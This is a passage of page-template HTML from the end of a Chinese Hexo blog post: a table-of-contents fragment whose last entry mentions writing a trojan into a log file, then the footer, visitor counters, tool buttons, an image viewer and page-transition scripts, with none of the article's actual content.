class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%99%E6%9C%A8%E9%A9%AC%E5%88%B0%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6"><span class="nav-text">写木马到日志文件</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>

			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">kivvs</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 20 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.9.0</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container" role="dialog" aria-modal="true" aria-label="图片查看器">
	<button class="image-viewer-close" type="button" aria-label="关闭">
		<i class="fa-solid fa-xmark"></i>
	</button>
	<button class="image-viewer-prev" type="button" aria-label="上一页">
		<i class="fa-solid fa-chevron-left"></i>
	</button>
	<div class="image-viewer-frame">
		<img src="" alt="">
	</div>
	<div class="image-viewer-exif-panel hidden absolute left-1/2 bottom-20 -translate-x-1/2 w-[min(92vw,420px)] max-h-[60vh] overflow-hidden rounded-2xl bg-background-color-transparent-80 p-4 text-left shadow-redefine-flat backdrop-blur-md" role="dialog" aria-label="EXIF" aria-hidden="true">
		<div class="flex items-center justify-between mb-3">
			<span class="text-sm font-semibold text-first-text-color">EXIF</span>
			<button class="image-viewer-exif-close flex h-8 w-8 items-center justify-center rounded-full bg-background-color-transparent-80 text-first-text-color transition hover:bg-background-color-transparent-40" type="button" aria-label="关闭">
				<i class="fa-solid fa-xmark text-[0.65rem]"></i>
			</button>
		</div>
		<div class="image-viewer-exif-cards grid grid-cols-1 sm:grid-cols-2 gap-3 max-h-[50vh] overflow-y-auto pr-1 scrollbar-hide"></div>
		<template class="image-viewer-exif-card-template">
			<div class="rounded-lg bg-background-color-transparent-40 px-3 py-2">
				<div class="image-viewer-exif-card-header flex items-center gap-2 mb-1">
					<i class="image-viewer-exif-card-icon fa-solid fa-circle-info text-xs text-third-text-color"></i>
					<div class="image-viewer-exif-card-title text-xs font-semibold text-first-text-color"></div>
				</div>
				<div class="image-viewer-exif-card-items flex flex-col gap-1"></div>
			</div>
		</template>
	</div>
	<button class="image-viewer-exif-toggle flex items-center gap-2 hidden absolute left-1/2 bottom-6 -translate-x-1/2 rounded-full border border-border-color bg-background-color-transparent-80 px-4 py-2 text-first-text-color backdrop-blur-md transition hover:bg-background-color-transparent-40" type="button" aria-label="EXIF" aria-expanded="false">
		<i class="fa-solid fa-circle-info text-xs"></i>
		<span class="text-xs font-semibold uppercase tracking-wider">EXIF</span>
	</button>
	<button class="image-viewer-next" type="button" aria-label="下一页">
		<i class="fa-solid fa-chevron-right"></i>
	</button>
</div>


	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    window.swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });

    window.dispatchEvent(
        new CustomEvent("redefine:swup:ready", {
            detail: {
                swup: window.swup,
            },
        }),
    );
</script>




	
<script src="/js/build/main.js" type="module"></script>



    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">















<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>



	
</body>

</html>